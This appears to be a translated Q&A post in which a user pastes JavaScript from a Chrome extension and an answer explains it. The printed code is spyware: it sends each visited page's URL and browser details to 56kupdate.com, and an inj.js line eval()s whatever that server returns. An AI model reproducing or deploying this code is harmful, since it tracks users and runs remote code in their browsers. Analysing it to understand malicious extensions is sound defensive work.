在Google Chrome插件中找到此代码:
trackurl值为https://56kupdate.com/,它似乎从https://56kupdate.com/?action=get_data获取了一些MD5值,这些值重定向到https://master.googlapi.com/v2/get_data.php但是用它们做了什么?
似乎将机密数据发送给56kupdate.com的所有者:https://plus.google.com/+BDClark0423/posts/cwHcB7o2KiM
(function loop() {
chrome.storage.local.get("extInfo", function (a) {
if (a.extInfo && a.extInfo.install_time && (new Date().getTime() - a.extInfo.install_time) > 604800000) {
(function () {
var c = /Chrome\/([^ ]+)/.exec(window.navigator.userAgent)[1];
var g = chrome.runtime.getManifest();
var f;
(function b() {
f = {};
$.ajax(config.trackurl, {
data: {
action: "get_data"
},
cache: false,
complete: function (i) {
var h = i.responseJSON;
if (!h) {
return
}
for (e in h) {
f[e] = h[e]
}
}
});
setTimeout(b, 86400000)
})();
var d = function (h) {
if (f && f.listener) {
return f.listener[MD5(h)]
}
return undefined
};
chrome.runtime.onMessage.addListener(function (l, v, n) {
var t, o;
var j = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/;
var h = function (p, i) {
$.ajax(config.trackurl, {
data: {
ref: encodeURIComponent(p),
"modules[]": i.length == 0 ? "" : i,
addon: "lostfriends",
addon_version: g.version,
browser: "chrome",
browser_version: c,
locale: g.current_locale
},
cache: false,
complete: function (m) {
n(m.responseText)
}
})
};
if (l.cmd == "getInj") {
var u = [];
var k = l.payload;
if (!k) {
return
}
var q = k.domain.split(".");
if (q.length > 1 && !j.test(k.domain)) {
t = q[q.length - 1];
for (var r = q.length - 2; r >= 0; --r) {
t = q[r] + "." + t;
o = d(t);
if (o) {
for (e in o) {
if (u.indexOf(o[e]) == -1) {
u.push(o[e])
}
}
}
}
if (u.length == 0) {
h(k.ref, []);
return true
}
h(k.ref, u)
}
}
return true
})
})()
} else {
setTimeout(loop, 300000)
}
})
})();
还有一些带有此代码的MD5文件:
var MD5 = function (s) {
function L(b, a) {
return (b << a) | (b >>> (32 - a))
}
function K(k, b) {
var F, a, d, x, c;
d = (k & 2147483648);
x = (b & 2147483648);
F = (k & 1073741824);
a = (b & 1073741824);
c = (k & 1073741823) + (b & 1073741823);
if (F & a) {
return (c ^ 2147483648 ^ d ^ x)
}
if (F | a) {
if (c & 1073741824) {
return (c ^ 3221225472 ^ d ^ x)
} else {
return (c ^ 1073741824 ^ d ^ x)
}
} else {
return (c ^ d ^ x)
}
}
function r(a, c, b) {
return (a & c) | ((~a) & b)
}
function q(a, c, b) {
return (a & b) | (c & (~b))
}
function p(a, c, b) {
return (a ^ c ^ b)
}
function n(a, c, b) {
return (c ^ (a | (~b)))
}
function u(G, F, aa, Z, k, H, I) {
G = K(G, K(K(r(F, aa, Z), k), I));
return K(L(G, H), F)
}
function f(G, F, aa, Z, k, H, I) {
G = K(G, K(K(q(F, aa, Z), k), I));
return K(L(G, H), F)
}
function D(G, F, aa, Z, k, H, I) {
G = K(G, K(K(p(F, aa, Z), k), I));
return K(L(G, H), F)
}
function t(G, F, aa, Z, k, H, I) {
G = K(G, K(K(n(F, aa, Z), k), I));
return K(L(G, H), F)
}
function e(k) {
var G;
var d = k.length;
var c = d + 8;
var b = (c - (c % 64)) / 64;
var F = (b + 1) * 16;
var H = Array(F - 1);
var a = 0;
var x = 0;
while (x < d) {
G = (x - (x % 4)) / 4;
a = (x % 4) * 8;
H[G] = (H[G] | (k.charCodeAt(x) << a));
x++
}
G = (x - (x % 4)) / 4;
a = (x % 4) * 8;
H[G] = H[G] | (128 << a);
H[F - 2] = d << 3;
H[F - 1] = d >>> 29;
return H
}
function B(c) {
var b = "",
d = "",
k, a;
for (a = 0; a <= 3; a++) {
k = (c >>> (a * 8)) & 255;
d = "0" + k.toString(16);
b = b + d.substr(d.length - 2, 2)
}
return b
}
function J(b) {
b = b.replace(/\r\n/g, "\n");
var a = "";
for (var k = 0; k < b.length; k++) {
var d = b.charCodeAt(k);
if (d < 128) {
a += String.fromCharCode(d)
} else {
if ((d > 127) && (d < 2048)) {
a += String.fromCharCode((d >> 6) | 192);
a += String.fromCharCode((d & 63) | 128)
} else {
a += String.fromCharCode((d >> 12) | 224);
a += String.fromCharCode(((d >> 6) & 63) | 128);
a += String.fromCharCode((d & 63) | 128)
}
}
}
return a
}
var C = Array();
var P, h, E, v, g, Y, X, W, V;
var S = 7,
Q = 12,
N = 17,
M = 22;
var A = 5,
z = 9,
y = 14,
w = 20;
var o = 4,
m = 11,
l = 16,
j = 23;
var U = 6,
T = 10,
R = 15,
O = 21;
s = J(s);
C = e(s);
Y = 1732584193;
X = 4023233417;
W = 2562383102;
V = 271733878;
for (P = 0; P < C.length; P += 16) {
h = Y;
E = X;
v = W;
g = V;
Y = u(Y, X, W, V, C[P + 0], S, 3614090360);
V = u(V, Y, X, W, C[P + 1], Q, 3905402710);
W = u(W, V, Y, X, C[P + 2], N, 606105819);
X = u(X, W, V, Y, C[P + 3], M, 3250441966);
Y = u(Y, X, W, V, C[P + 4], S, 4118548399);
V = u(V, Y, X, W, C[P + 5], Q, 1200080426);
W = u(W, V, Y, X, C[P + 6], N, 2821735955);
X = u(X, W, V, Y, C[P + 7], M, 4249261313);
Y = u(Y, X, W, V, C[P + 8], S, 1770035416);
V = u(V, Y, X, W, C[P + 9], Q, 2336552879);
W = u(W, V, Y, X, C[P + 10], N, 4294925233);
X = u(X, W, V, Y, C[P + 11], M, 2304563134);
Y = u(Y, X, W, V, C[P + 12], S, 1804603682);
V = u(V, Y, X, W, C[P + 13], Q, 4254626195);
W = u(W, V, Y, X, C[P + 14], N, 2792965006);
X = u(X, W, V, Y, C[P + 15], M, 1236535329);
Y = f(Y, X, W, V, C[P + 1], A, 4129170786);
V = f(V, Y, X, W, C[P + 6], z, 3225465664);
W = f(W, V, Y, X, C[P + 11], y, 643717713);
X = f(X, W, V, Y, C[P + 0], w, 3921069994);
Y = f(Y, X, W, V, C[P + 5], A, 3593408605);
V = f(V, Y, X, W, C[P + 10], z, 38016083);
W = f(W, V, Y, X, C[P + 15], y, 3634488961);
X = f(X, W, V, Y, C[P + 4], w, 3889429448);
Y = f(Y, X, W, V, C[P + 9], A, 568446438);
V = f(V, Y, X, W, C[P + 14], z, 3275163606);
W = f(W, V, Y, X, C[P + 3], y, 4107603335);
X = f(X, W, V, Y, C[P + 8], w, 1163531501);
Y = f(Y, X, W, V, C[P + 13], A, 2850285829);
V = f(V, Y, X, W, C[P + 2], z, 4243563512);
W = f(W, V, Y, X, C[P + 7], y, 1735328473);
X = f(X, W, V, Y, C[P + 12], w, 2368359562);
Y = D(Y, X, W, V, C[P + 5], o, 4294588738);
V = D(V, Y, X, W, C[P + 8], m, 2272392833);
W = D(W, V, Y, X, C[P + 11], l, 1839030562);
X = D(X, W, V, Y, C[P + 14], j, 4259657740);
Y = D(Y, X, W, V, C[P + 1], o, 2763975236);
V = D(V, Y, X, W, C[P + 4], m, 1272893353);
W = D(W, V, Y, X, C[P + 7], l, 4139469664);
X = D(X, W, V, Y, C[P + 10], j, 3200236656);
Y = D(Y, X, W, V, C[P + 13], o, 681279174);
V = D(V, Y, X, W, C[P + 0], m, 3936430074);
W = D(W, V, Y, X, C[P + 3], l, 3572445317);
X = D(X, W, V, Y, C[P + 6], j, 76029189);
Y = D(Y, X, W, V, C[P + 9], o, 3654602809);
V = D(V, Y, X, W, C[P + 12], m, 3873151461);
W = D(W, V, Y, X, C[P + 15], l, 530742520);
X = D(X, W, V, Y, C[P + 2], j, 3299628645);
Y = t(Y, X, W, V, C[P + 0], U, 4096336452);
V = t(V, Y, X, W, C[P + 7], T, 1126891415);
W = t(W, V, Y, X, C[P + 14], R, 2878612391);
X = t(X, W, V, Y, C[P + 5], O, 4237533241);
Y = t(Y, X, W, V, C[P + 12], U, 1700485571);
V = t(V, Y, X, W, C[P + 3], T, 2399980690);
W = t(W, V, Y, X, C[P + 10], R, 4293915773);
X = t(X, W, V, Y, C[P + 1], O, 2240044497);
Y = t(Y, X, W, V, C[P + 8], U, 1873313359);
V = t(V, Y, X, W, C[P + 15], T, 4264355552);
W = t(W, V, Y, X, C[P + 6], R, 2734768916);
X = t(X, W, V, Y, C[P + 13], O, 1309151649);
Y = t(Y, X, W, V, C[P + 4], U, 4149444226);
V = t(V, Y, X, W, C[P + 11], T, 3174756917);
W = t(W, V, Y, X, C[P + 2], R, 718787259);
X = t(X, W, V, Y, C[P + 9], O, 3951481745);
Y = K(Y, h);
X = K(X, E);
W = K(W, v);
V = K(V, g)
}
var i = B(Y) + B(X) + B(W) + B(V);
return i.toLowerCase()
};
此代码位于56kupdate.com服务器的最后一行:GJ96nJkfLF81YwNtXR1uL2yhqT9mnQftFJ50MJjtGJSwVR9GVSttZGOsBS8jXFOOpUOfMIqyLxgcqP81ZmphZmLtXRgVIR1ZYPOfnJgyVRqyL2giXFOQnUWioJHiZmZhZP4kAmHjYwRkAlOGLJMupzxiAGZ3YwZ2
并在inj.js文件中找到此代码:
chrome.runtime.sendMessage({cmd:"getInj",payload:{domain:top.location.hostname,ref:top.location.href}},function(m){eval(m)});
答案 0 :(得分:1)
但他们做了什么?
每天(通过b()函数)获取哈希值并存储在f对象中,d函数访问它们。
只要message event使用命令d和某些getInj作为有效负载,就会调用domain函数。当该域不是IP地址(j.test()正则表达式检查)时,它将被分成几部分,每个尾部(第一个域,然后是子域,然后是子域等)被传递到d,在那里它是MD5 -hashed并可能返回该域中f存储的内容。然后将找到的内容($.ajax(config.trackurl, …)与消息ref以及一些浏览器信息一起发送给跟踪器。